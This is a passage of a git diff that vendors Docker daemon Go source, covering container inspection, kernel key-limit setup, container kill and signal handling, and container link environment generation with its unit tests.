container.State.OOMKilled, + Dead: container.State.Dead, + Pid: container.State.Pid, + ExitCode: container.State.ExitCode(), + Error: container.State.Error(), + StartedAt: container.State.StartedAt.Format(time.RFC3339Nano), + FinishedAt: container.State.FinishedAt.Format(time.RFC3339Nano), + Health: containerHealth, + } + + contJSONBase := &types.ContainerJSONBase{ + ID: container.ID, + Created: container.Created.Format(time.RFC3339Nano), + Path: container.Path, + Args: container.Args, + State: containerState, + Image: container.ImageID.String(), + LogPath: container.LogPath, + Name: container.Name, + RestartCount: container.RestartCount, + Driver: container.Driver, + MountLabel: container.MountLabel, + ProcessLabel: container.ProcessLabel, + ExecIDs: container.GetExecIDs(), + HostConfig: &hostConfig, + } + + var ( + sizeRw int64 + sizeRootFs int64 + ) + if size { + sizeRw, sizeRootFs = daemon.getSize(container) + contJSONBase.SizeRw = &sizeRw + contJSONBase.SizeRootFs = &sizeRootFs + } + + // Now set any platform-specific fields + contJSONBase = setPlatformSpecificContainerFields(container, contJSONBase) + + contJSONBase.GraphDriver.Name = container.Driver + + graphDriverData, err := container.RWLayer.Metadata() + // If container is marked as Dead, the container's graphdriver metadata + // could have been removed, it will cause error if we try to get the metadata, + // we can ignore the error if the container is dead. + if err != nil && !container.Dead { + return nil, err + } + contJSONBase.GraphDriver.Data = graphDriverData + + return contJSONBase, nil +} + +// ContainerExecInspect returns low-level information about the exec +// command. An error is returned if the exec cannot be found. 
+func (daemon *Daemon) ContainerExecInspect(id string) (*backend.ExecInspect, error) { + e, err := daemon.getExecConfig(id) + if err != nil { + return nil, err + } + + pc := inspectExecProcessConfig(e) + + return &backend.ExecInspect{ + ID: e.ID, + Running: e.Running, + ExitCode: e.ExitCode, + ProcessConfig: pc, + OpenStdin: e.OpenStdin, + OpenStdout: e.OpenStdout, + OpenStderr: e.OpenStderr, + CanRemove: e.CanRemove, + ContainerID: e.ContainerID, + DetachKeys: e.DetachKeys, + Pid: e.Pid, + }, nil +} + +// VolumeInspect looks up a volume by name. An error is returned if +// the volume cannot be found. +func (daemon *Daemon) VolumeInspect(name string) (*types.Volume, error) { + v, err := daemon.volumes.Get(name) + if err != nil { + return nil, err + } + apiV := volumeToAPIType(v) + apiV.Mountpoint = v.Path() + apiV.Status = v.Status() + return apiV, nil +} + +func (daemon *Daemon) getBackwardsCompatibleNetworkSettings(settings *network.Settings) *v1p20.NetworkSettings { + result := &v1p20.NetworkSettings{ + NetworkSettingsBase: types.NetworkSettingsBase{ + Bridge: settings.Bridge, + SandboxID: settings.SandboxID, + HairpinMode: settings.HairpinMode, + LinkLocalIPv6Address: settings.LinkLocalIPv6Address, + LinkLocalIPv6PrefixLen: settings.LinkLocalIPv6PrefixLen, + Ports: settings.Ports, + SandboxKey: settings.SandboxKey, + SecondaryIPAddresses: settings.SecondaryIPAddresses, + SecondaryIPv6Addresses: settings.SecondaryIPv6Addresses, + }, + DefaultNetworkSettings: daemon.getDefaultNetworkSettings(settings.Networks), + } + + return result +} + +// getDefaultNetworkSettings creates the deprecated structure that holds the information +// about the bridge network for a container. 
+func (daemon *Daemon) getDefaultNetworkSettings(networks map[string]*network.EndpointSettings) types.DefaultNetworkSettings { + var settings types.DefaultNetworkSettings + + if defaultNetwork, ok := networks["bridge"]; ok && defaultNetwork.EndpointSettings != nil { + settings.EndpointID = defaultNetwork.EndpointID + settings.Gateway = defaultNetwork.Gateway + settings.GlobalIPv6Address = defaultNetwork.GlobalIPv6Address + settings.GlobalIPv6PrefixLen = defaultNetwork.GlobalIPv6PrefixLen + settings.IPAddress = defaultNetwork.IPAddress + settings.IPPrefixLen = defaultNetwork.IPPrefixLen + settings.IPv6Gateway = defaultNetwork.IPv6Gateway + settings.MacAddress = defaultNetwork.MacAddress + } + return settings +} diff --git a/vendor/github.com/docker/docker/daemon/inspect_solaris.go b/vendor/github.com/docker/docker/daemon/inspect_solaris.go new file mode 100644 index 0000000000..0e3dcc1119 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/inspect_solaris.go @@ -0,0 +1,41 @@ +package daemon + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/versions/v1p19" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" +) + +// This sets platform-specific fields +func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase { + return contJSONBase +} + +// containerInspectPre120 get containers for pre 1.20 APIs. 
+func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, error) { + return &v1p19.ContainerJSON{}, nil +} + +func addMountPoints(container *container.Container) []types.MountPoint { + mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) + for _, m := range container.MountPoints { + mountPoints = append(mountPoints, types.MountPoint{ + Name: m.Name, + Source: m.Path(), + Destination: m.Destination, + Driver: m.Driver, + RW: m.RW, + }) + } + return mountPoints +} + +func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig { + return &backend.ExecProcessConfig{ + Tty: e.Tty, + Entrypoint: e.Entrypoint, + Arguments: e.Args, + } +} diff --git a/vendor/github.com/docker/docker/daemon/inspect_unix.go b/vendor/github.com/docker/docker/daemon/inspect_unix.go new file mode 100644 index 0000000000..08a82235ad --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/inspect_unix.go @@ -0,0 +1,92 @@ +// +build !windows,!solaris + +package daemon + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/versions/v1p19" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" +) + +// This sets platform-specific fields +func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase { + contJSONBase.AppArmorProfile = container.AppArmorProfile + contJSONBase.ResolvConfPath = container.ResolvConfPath + contJSONBase.HostnamePath = container.HostnamePath + contJSONBase.HostsPath = container.HostsPath + + return contJSONBase +} + +// containerInspectPre120 gets containers for pre 1.20 APIs. 
+func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, error) { + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + container.Lock() + defer container.Unlock() + + base, err := daemon.getInspectData(container, false) + if err != nil { + return nil, err + } + + volumes := make(map[string]string) + volumesRW := make(map[string]bool) + for _, m := range container.MountPoints { + volumes[m.Destination] = m.Path() + volumesRW[m.Destination] = m.RW + } + + config := &v1p19.ContainerConfig{ + Config: container.Config, + MacAddress: container.Config.MacAddress, + NetworkDisabled: container.Config.NetworkDisabled, + ExposedPorts: container.Config.ExposedPorts, + VolumeDriver: container.HostConfig.VolumeDriver, + Memory: container.HostConfig.Memory, + MemorySwap: container.HostConfig.MemorySwap, + CPUShares: container.HostConfig.CPUShares, + CPUSet: container.HostConfig.CpusetCpus, + } + networkSettings := daemon.getBackwardsCompatibleNetworkSettings(container.NetworkSettings) + + return &v1p19.ContainerJSON{ + ContainerJSONBase: base, + Volumes: volumes, + VolumesRW: volumesRW, + Config: config, + NetworkSettings: networkSettings, + }, nil +} + +func addMountPoints(container *container.Container) []types.MountPoint { + mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) + for _, m := range container.MountPoints { + mountPoints = append(mountPoints, types.MountPoint{ + Type: m.Type, + Name: m.Name, + Source: m.Path(), + Destination: m.Destination, + Driver: m.Driver, + Mode: m.Mode, + RW: m.RW, + Propagation: m.Propagation, + }) + } + return mountPoints +} + +func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig { + return &backend.ExecProcessConfig{ + Tty: e.Tty, + Entrypoint: e.Entrypoint, + Arguments: e.Args, + Privileged: &e.Privileged, + User: e.User, + } +} diff --git a/vendor/github.com/docker/docker/daemon/inspect_windows.go 
b/vendor/github.com/docker/docker/daemon/inspect_windows.go new file mode 100644 index 0000000000..b331c83ca3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/inspect_windows.go @@ -0,0 +1,41 @@ +package daemon + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" +) + +// This sets platform-specific fields +func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase { + return contJSONBase +} + +func addMountPoints(container *container.Container) []types.MountPoint { + mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) + for _, m := range container.MountPoints { + mountPoints = append(mountPoints, types.MountPoint{ + Type: m.Type, + Name: m.Name, + Source: m.Path(), + Destination: m.Destination, + Driver: m.Driver, + RW: m.RW, + }) + } + return mountPoints +} + +// containerInspectPre120 get containers for pre 1.20 APIs. 
+func (daemon *Daemon) containerInspectPre120(name string) (*types.ContainerJSON, error) { + return daemon.ContainerInspectCurrent(name, false) +} + +func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig { + return &backend.ExecProcessConfig{ + Tty: e.Tty, + Entrypoint: e.Entrypoint, + Arguments: e.Args, + } +} diff --git a/vendor/github.com/docker/docker/daemon/keys.go b/vendor/github.com/docker/docker/daemon/keys.go new file mode 100644 index 0000000000..055d488a5d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/keys.go @@ -0,0 +1,59 @@ +// +build linux + +package daemon + +import ( + "fmt" + "io/ioutil" + "os" + "strconv" + "strings" +) + +const ( + rootKeyFile = "/proc/sys/kernel/keys/root_maxkeys" + rootBytesFile = "/proc/sys/kernel/keys/root_maxbytes" + rootKeyLimit = 1000000 + // it is standard configuration to allocate 25 bytes per key + rootKeyByteMultiplier = 25 +) + +// ModifyRootKeyLimit checks to see if the root key limit is set to +// at least 1000000 and changes it to that limit along with the maxbytes +// allocated to the keys at a 25 to 1 multiplier. 
+func ModifyRootKeyLimit() error { + value, err := readRootKeyLimit(rootKeyFile) + if err != nil { + return err + } + if value < rootKeyLimit { + return setRootKeyLimit(rootKeyLimit) + } + return nil +} + +func setRootKeyLimit(limit int) error { + keys, err := os.OpenFile(rootKeyFile, os.O_WRONLY, 0) + if err != nil { + return err + } + defer keys.Close() + if _, err := fmt.Fprintf(keys, "%d", limit); err != nil { + return err + } + bytes, err := os.OpenFile(rootBytesFile, os.O_WRONLY, 0) + if err != nil { + return err + } + defer bytes.Close() + _, err = fmt.Fprintf(bytes, "%d", limit*rootKeyByteMultiplier) + return err +} + +func readRootKeyLimit(path string) (int, error) { + data, err := ioutil.ReadFile(path) + if err != nil { + return -1, err + } + return strconv.Atoi(strings.Trim(string(data), "\n")) +} diff --git a/vendor/github.com/docker/docker/daemon/keys_unsupported.go b/vendor/github.com/docker/docker/daemon/keys_unsupported.go new file mode 100644 index 0000000000..b17255940a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/keys_unsupported.go @@ -0,0 +1,8 @@ +// +build !linux + +package daemon + +// ModifyRootKeyLimit is an noop on unsupported platforms. +func ModifyRootKeyLimit() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/kill.go b/vendor/github.com/docker/docker/daemon/kill.go new file mode 100644 index 0000000000..18d5bbb4e5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/kill.go @@ -0,0 +1,164 @@ +package daemon + +import ( + "fmt" + "runtime" + "strings" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/signal" +) + +type errNoSuchProcess struct { + pid int + signal int +} + +func (e errNoSuchProcess) Error() string { + return fmt.Sprintf("Cannot kill process (pid=%d) with signal %d: no such process.", e.pid, e.signal) +} + +// isErrNoSuchProcess returns true if the error +// is an instance of errNoSuchProcess. 
+func isErrNoSuchProcess(err error) bool { + _, ok := err.(errNoSuchProcess) + return ok +} + +// ContainerKill sends signal to the container +// If no signal is given (sig 0), then Kill with SIGKILL and wait +// for the container to exit. +// If a signal is given, then just send it to the container and return. +func (daemon *Daemon) ContainerKill(name string, sig uint64) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if sig != 0 && !signal.ValidSignalForPlatform(syscall.Signal(sig)) { + return fmt.Errorf("The %s daemon does not support signal %d", runtime.GOOS, sig) + } + + // If no signal is passed, or SIGKILL, perform regular Kill (SIGKILL + wait()) + if sig == 0 || syscall.Signal(sig) == syscall.SIGKILL { + return daemon.Kill(container) + } + return daemon.killWithSignal(container, int(sig)) +} + +// killWithSignal sends the container the given signal. This wrapper for the +// host specific kill command prepares the container before attempting +// to send the signal. An error is returned if the container is paused +// or not running, or if there is a problem returned from the +// underlying kill command. +func (daemon *Daemon) killWithSignal(container *container.Container, sig int) error { + logrus.Debugf("Sending kill signal %d to container %s", sig, container.ID) + container.Lock() + defer container.Unlock() + + // We could unpause the container for them rather than returning this error + if container.Paused { + return fmt.Errorf("Container %s is paused. 
Unpause the container before stopping", container.ID) + } + + if !container.Running { + return errNotRunning{container.ID} + } + + if container.Config.StopSignal != "" { + containerStopSignal, err := signal.ParseSignal(container.Config.StopSignal) + if err != nil { + return err + } + if containerStopSignal == syscall.Signal(sig) { + container.ExitOnNext() + } + } else { + container.ExitOnNext() + } + + if !daemon.IsShuttingDown() { + container.HasBeenManuallyStopped = true + } + + // if the container is currently restarting we do not need to send the signal + // to the process. Telling the monitor that it should exit on its next event + // loop is enough + if container.Restarting { + return nil + } + + if err := daemon.kill(container, sig); err != nil { + err = fmt.Errorf("Cannot kill container %s: %s", container.ID, err) + // if container or process not exists, ignore the error + if strings.Contains(err.Error(), "container not found") || + strings.Contains(err.Error(), "no such process") { + logrus.Warnf("container kill failed because of 'container not found' or 'no such process': %s", err.Error()) + } else { + return err + } + } + + attributes := map[string]string{ + "signal": fmt.Sprintf("%d", sig), + } + daemon.LogContainerEventWithAttributes(container, "kill", attributes) + return nil +} + +// Kill forcefully terminates a container. +func (daemon *Daemon) Kill(container *container.Container) error { + if !container.IsRunning() { + return errNotRunning{container.ID} + } + + // 1. Send SIGKILL + if err := daemon.killPossiblyDeadProcess(container, int(syscall.SIGKILL)); err != nil { + // While normally we might "return err" here we're not going to + // because if we can't stop the container by this point then + // its probably because its already stopped. Meaning, between + // the time of the IsRunning() call above and now it stopped. 
+ // Also, since the err return will be environment specific we can't + // look for any particular (common) error that would indicate + // that the process is already dead vs something else going wrong. + // So, instead we'll give it up to 2 more seconds to complete and if + // by that time the container is still running, then the error + // we got is probably valid and so we return it to the caller. + if isErrNoSuchProcess(err) { + return nil + } + + if _, err2 := container.WaitStop(2 * time.Second); err2 != nil { + return err + } + } + + // 2. Wait for the process to die, in last resort, try to kill the process directly + if err := killProcessDirectly(container); err != nil { + if isErrNoSuchProcess(err) { + return nil + } + return err + } + + container.WaitStop(-1 * time.Second) + return nil +} + +// killPossibleDeadProcess is a wrapper around killSig() suppressing "no such process" error. +func (daemon *Daemon) killPossiblyDeadProcess(container *container.Container, sig int) error { + err := daemon.killWithSignal(container, sig) + if err == syscall.ESRCH { + e := errNoSuchProcess{container.GetPID(), sig} + logrus.Debug(e) + return e + } + return err +} + +func (daemon *Daemon) kill(c *container.Container, sig int) error { + return daemon.containerd.Signal(c.ID, sig) +} diff --git a/vendor/github.com/docker/docker/daemon/links.go b/vendor/github.com/docker/docker/daemon/links.go new file mode 100644 index 0000000000..7f691d4f16 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links.go @@ -0,0 +1,87 @@ +package daemon + +import ( + "sync" + + "github.com/docker/docker/container" +) + +// linkIndex stores link relationships between containers, including their specified alias +// The alias is the name the parent uses to reference the child +type linkIndex struct { + // idx maps a parent->alias->child relationship + idx map[*container.Container]map[string]*container.Container + // childIdx maps child->parent->aliases + childIdx 
map[*container.Container]map[*container.Container]map[string]struct{} + mu sync.Mutex +} + +func newLinkIndex() *linkIndex { + return &linkIndex{ + idx: make(map[*container.Container]map[string]*container.Container), + childIdx: make(map[*container.Container]map[*container.Container]map[string]struct{}), + } +} + +// link adds indexes for the passed in parent/child/alias relationships +func (l *linkIndex) link(parent, child *container.Container, alias string) { + l.mu.Lock() + + if l.idx[parent] == nil { + l.idx[parent] = make(map[string]*container.Container) + } + l.idx[parent][alias] = child + if l.childIdx[child] == nil { + l.childIdx[child] = make(map[*container.Container]map[string]struct{}) + } + if l.childIdx[child][parent] == nil { + l.childIdx[child][parent] = make(map[string]struct{}) + } + l.childIdx[child][parent][alias] = struct{}{} + + l.mu.Unlock() +} + +// unlink removes the requested alias for the given parent/child +func (l *linkIndex) unlink(alias string, child, parent *container.Container) { + l.mu.Lock() + delete(l.idx[parent], alias) + delete(l.childIdx[child], parent) + l.mu.Unlock() +} + +// children maps all the aliases-> children for the passed in parent +// aliases here are the aliases the parent uses to refer to the child +func (l *linkIndex) children(parent *container.Container) map[string]*container.Container { + l.mu.Lock() + children := l.idx[parent] + l.mu.Unlock() + return children +} + +// parents maps all the aliases->parent for the passed in child +// aliases here are the aliases the parents use to refer to the child +func (l *linkIndex) parents(child *container.Container) map[string]*container.Container { + l.mu.Lock() + + parents := make(map[string]*container.Container) + for parent, aliases := range l.childIdx[child] { + for alias := range aliases { + parents[alias] = parent + } + } + + l.mu.Unlock() + return parents +} + +// delete deletes all link relationships referencing this container +func (l *linkIndex) 
delete(container *container.Container) { + l.mu.Lock() + for _, child := range l.idx[container] { + delete(l.childIdx[child], container) + } + delete(l.idx, container) + delete(l.childIdx, container) + l.mu.Unlock() +} diff --git a/vendor/github.com/docker/docker/daemon/links/links.go b/vendor/github.com/docker/docker/daemon/links/links.go new file mode 100644 index 0000000000..af15de046d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links/links.go @@ -0,0 +1,141 @@ +package links + +import ( + "fmt" + "path" + "strings" + + "github.com/docker/go-connections/nat" +) + +// Link struct holds informations about parent/child linked container +type Link struct { + // Parent container IP address + ParentIP string + // Child container IP address + ChildIP string + // Link name + Name string + // Child environments variables + ChildEnvironment []string + // Child exposed ports + Ports []nat.Port +} + +// NewLink initializes a new Link struct with the provided options. +func NewLink(parentIP, childIP, name string, env []string, exposedPorts map[nat.Port]struct{}) *Link { + var ( + i int + ports = make([]nat.Port, len(exposedPorts)) + ) + + for p := range exposedPorts { + ports[i] = p + i++ + } + + return &Link{ + Name: name, + ChildIP: childIP, + ParentIP: parentIP, + ChildEnvironment: env, + Ports: ports, + } +} + +// ToEnv creates a string's slice containing child container informations in +// the form of environment variables which will be later exported on container +// startup. 
+func (l *Link) ToEnv() []string { + env := []string{} + + _, n := path.Split(l.Name) + alias := strings.Replace(strings.ToUpper(n), "-", "_", -1) + + if p := l.getDefaultPort(); p != nil { + env = append(env, fmt.Sprintf("%s_PORT=%s://%s:%s", alias, p.Proto(), l.ChildIP, p.Port())) + } + + //sort the ports so that we can bulk the continuous ports together + nat.Sort(l.Ports, func(ip, jp nat.Port) bool { + // If the two ports have the same number, tcp takes priority + // Sort in desc order + return ip.Int() < jp.Int() || (ip.Int() == jp.Int() && strings.ToLower(ip.Proto()) == "tcp") + }) + + for i := 0; i < len(l.Ports); { + p := l.Ports[i] + j := nextContiguous(l.Ports, p.Int(), i) + if j > i+1 { + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_START=%s://%s:%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto(), l.ChildIP, p.Port())) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_ADDR=%s", alias, p.Port(), strings.ToUpper(p.Proto()), l.ChildIP)) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PROTO=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto())) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PORT_START=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Port())) + + q := l.Ports[j] + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_END=%s://%s:%s", alias, p.Port(), strings.ToUpper(q.Proto()), q.Proto(), l.ChildIP, q.Port())) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PORT_END=%s", alias, p.Port(), strings.ToUpper(q.Proto()), q.Port())) + + i = j + 1 + continue + } else { + i++ + } + } + for _, p := range l.Ports { + env = append(env, fmt.Sprintf("%s_PORT_%s_%s=%s://%s:%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Proto(), l.ChildIP, p.Port())) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_ADDR=%s", alias, p.Port(), strings.ToUpper(p.Proto()), l.ChildIP)) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PORT=%s", alias, p.Port(), strings.ToUpper(p.Proto()), p.Port())) + env = append(env, fmt.Sprintf("%s_PORT_%s_%s_PROTO=%s", alias, p.Port(), 
strings.ToUpper(p.Proto()), p.Proto())) + } + + // Load the linked container's name into the environment + env = append(env, fmt.Sprintf("%s_NAME=%s", alias, l.Name)) + + if l.ChildEnvironment != nil { + for _, v := range l.ChildEnvironment { + parts := strings.SplitN(v, "=", 2) + if len(parts) < 2 { + continue + } + // Ignore a few variables that are added during docker build (and not really relevant to linked containers) + if parts[0] == "HOME" || parts[0] == "PATH" { + continue + } + env = append(env, fmt.Sprintf("%s_ENV_%s=%s", alias, parts[0], parts[1])) + } + } + return env +} + +func nextContiguous(ports []nat.Port, value int, index int) int { + if index+1 == len(ports) { + return index + } + for i := index + 1; i < len(ports); i++ { + if ports[i].Int() > value+1 { + return i - 1 + } + + value++ + } + return len(ports) - 1 +} + +// Default port rules +func (l *Link) getDefaultPort() *nat.Port { + var p nat.Port + i := len(l.Ports) + + if i == 0 { + return nil + } else if i > 1 { + nat.Sort(l.Ports, func(ip, jp nat.Port) bool { + // If the two ports have the same number, tcp takes priority + // Sort in desc order + return ip.Int() < jp.Int() || (ip.Int() == jp.Int() && strings.ToLower(ip.Proto()) == "tcp") + }) + } + p = l.Ports[0] + return &p +} diff --git a/vendor/github.com/docker/docker/daemon/links/links_test.go b/vendor/github.com/docker/docker/daemon/links/links_test.go new file mode 100644 index 0000000000..0273f13cf0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/links/links_test.go @@ -0,0 +1,213 @@ +package links + +import ( + "fmt" + "strings" + "testing" + + "github.com/docker/go-connections/nat" +) + +// Just to make life easier +func newPortNoError(proto, port string) nat.Port { + p, _ := nat.NewPort(proto, port) + return p +} + +func TestLinkNaming(t *testing.T) { + ports := make(nat.PortSet) + ports[newPortNoError("tcp", "6379")] = struct{}{} + + link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker-1", nil, ports) + + rawEnv := 
link.ToEnv() + env := make(map[string]string, len(rawEnv)) + for _, e := range rawEnv { + parts := strings.Split(e, "=") + if len(parts) != 2 { + t.FailNow() + } + env[parts[0]] = parts[1] + } + + value, ok := env["DOCKER_1_PORT"] + + if !ok { + t.Fatalf("DOCKER_1_PORT not found in env") + } + + if value != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_1_PORT"]) + } +} + +func TestLinkNew(t *testing.T) { + ports := make(nat.PortSet) + ports[newPortNoError("tcp", "6379")] = struct{}{} + + link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", nil, ports) + + if link.Name != "/db/docker" { + t.Fail() + } + if link.ParentIP != "172.0.17.3" { + t.Fail() + } + if link.ChildIP != "172.0.17.2" { + t.Fail() + } + for _, p := range link.Ports { + if p != newPortNoError("tcp", "6379") { + t.Fail() + } + } +} + +func TestLinkEnv(t *testing.T) { + ports := make(nat.PortSet) + ports[newPortNoError("tcp", "6379")] = struct{}{} + + link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", []string{"PASSWORD=gordon"}, ports) + + rawEnv := link.ToEnv() + env := make(map[string]string, len(rawEnv)) + for _, e := range rawEnv { + parts := strings.Split(e, "=") + if len(parts) != 2 { + t.FailNow() + } + env[parts[0]] = parts[1] + } + if env["DOCKER_PORT"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_PORT"]) + } + if env["DOCKER_PORT_6379_TCP"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected tcp://172.0.17.2:6379, got %s", env["DOCKER_PORT_6379_TCP"]) + } + if env["DOCKER_PORT_6379_TCP_PROTO"] != "tcp" { + t.Fatalf("Expected tcp, got %s", env["DOCKER_PORT_6379_TCP_PROTO"]) + } + if env["DOCKER_PORT_6379_TCP_ADDR"] != "172.0.17.2" { + t.Fatalf("Expected 172.0.17.2, got %s", env["DOCKER_PORT_6379_TCP_ADDR"]) + } + if env["DOCKER_PORT_6379_TCP_PORT"] != "6379" { + t.Fatalf("Expected 6379, got %s", env["DOCKER_PORT_6379_TCP_PORT"]) + } + if env["DOCKER_NAME"] != "/db/docker" { + t.Fatalf("Expected 
/db/docker, got %s", env["DOCKER_NAME"]) + } + if env["DOCKER_ENV_PASSWORD"] != "gordon" { + t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"]) + } +} + +func TestLinkMultipleEnv(t *testing.T) { + ports := make(nat.PortSet) + ports[newPortNoError("tcp", "6379")] = struct{}{} + ports[newPortNoError("tcp", "6380")] = struct{}{} + ports[newPortNoError("tcp", "6381")] = struct{}{} + + link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", []string{"PASSWORD=gordon"}, ports) + + rawEnv := link.ToEnv() + env := make(map[string]string, len(rawEnv)) + for _, e := range rawEnv { + parts := strings.Split(e, "=") + if len(parts) != 2 { + t.FailNow() + } + env[parts[0]] = parts[1] + } + if env["DOCKER_PORT"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_PORT"]) + } + if env["DOCKER_PORT_6379_TCP_START"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected tcp://172.0.17.2:6379, got %s", env["DOCKER_PORT_6379_TCP_START"]) + } + if env["DOCKER_PORT_6379_TCP_END"] != "tcp://172.0.17.2:6381" { + t.Fatalf("Expected tcp://172.0.17.2:6381, got %s", env["DOCKER_PORT_6379_TCP_END"]) + } + if env["DOCKER_PORT_6379_TCP_PROTO"] != "tcp" { + t.Fatalf("Expected tcp, got %s", env["DOCKER_PORT_6379_TCP_PROTO"]) + } + if env["DOCKER_PORT_6379_TCP_ADDR"] != "172.0.17.2" { + t.Fatalf("Expected 172.0.17.2, got %s", env["DOCKER_PORT_6379_TCP_ADDR"]) + } + if env["DOCKER_PORT_6379_TCP_PORT_START"] != "6379" { + t.Fatalf("Expected 6379, got %s", env["DOCKER_PORT_6379_TCP_PORT_START"]) + } + if env["DOCKER_PORT_6379_TCP_PORT_END"] != "6381" { + t.Fatalf("Expected 6381, got %s", env["DOCKER_PORT_6379_TCP_PORT_END"]) + } + if env["DOCKER_NAME"] != "/db/docker" { + t.Fatalf("Expected /db/docker, got %s", env["DOCKER_NAME"]) + } + if env["DOCKER_ENV_PASSWORD"] != "gordon" { + t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"]) + } +} + +func TestLinkPortRangeEnv(t *testing.T) { + ports := make(nat.PortSet) + ports[newPortNoError("tcp", 
"6379")] = struct{}{} + ports[newPortNoError("tcp", "6380")] = struct{}{} + ports[newPortNoError("tcp", "6381")] = struct{}{} + + link := NewLink("172.0.17.3", "172.0.17.2", "/db/docker", []string{"PASSWORD=gordon"}, ports) + + rawEnv := link.ToEnv() + env := make(map[string]string, len(rawEnv)) + for _, e := range rawEnv { + parts := strings.Split(e, "=") + if len(parts) != 2 { + t.FailNow() + } + env[parts[0]] = parts[1] + } + + if env["DOCKER_PORT"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected 172.0.17.2:6379, got %s", env["DOCKER_PORT"]) + } + if env["DOCKER_PORT_6379_TCP_START"] != "tcp://172.0.17.2:6379" { + t.Fatalf("Expected tcp://172.0.17.2:6379, got %s", env["DOCKER_PORT_6379_TCP_START"]) + } + if env["DOCKER_PORT_6379_TCP_END"] != "tcp://172.0.17.2:6381" { + t.Fatalf("Expected tcp://172.0.17.2:6381, got %s", env["DOCKER_PORT_6379_TCP_END"]) + } + if env["DOCKER_PORT_6379_TCP_PROTO"] != "tcp" { + t.Fatalf("Expected tcp, got %s", env["DOCKER_PORT_6379_TCP_PROTO"]) + } + if env["DOCKER_PORT_6379_TCP_ADDR"] != "172.0.17.2" { + t.Fatalf("Expected 172.0.17.2, got %s", env["DOCKER_PORT_6379_TCP_ADDR"]) + } + if env["DOCKER_PORT_6379_TCP_PORT_START"] != "6379" { + t.Fatalf("Expected 6379, got %s", env["DOCKER_PORT_6379_TCP_PORT_START"]) + } + if env["DOCKER_PORT_6379_TCP_PORT_END"] != "6381" { + t.Fatalf("Expected 6381, got %s", env["DOCKER_PORT_6379_TCP_PORT_END"]) + } + if env["DOCKER_NAME"] != "/db/docker" { + t.Fatalf("Expected /db/docker, got %s", env["DOCKER_NAME"]) + } + if env["DOCKER_ENV_PASSWORD"] != "gordon" { + t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"]) + } + for i := range []int{6379, 6380, 6381} { + tcpaddr := fmt.Sprintf("DOCKER_PORT_%d_TCP_ADDR", i) + tcpport := fmt.Sprintf("DOCKER_PORT_%d_TCP+PORT", i) + tcpproto := fmt.Sprintf("DOCKER_PORT_%d_TCP+PROTO", i) + tcp := fmt.Sprintf("DOCKER_PORT_%d_TCP", i) + if env[tcpaddr] == "172.0.17.2" { + t.Fatalf("Expected env %s = 172.0.17.2, got %s", tcpaddr, env[tcpaddr]) + } + if 
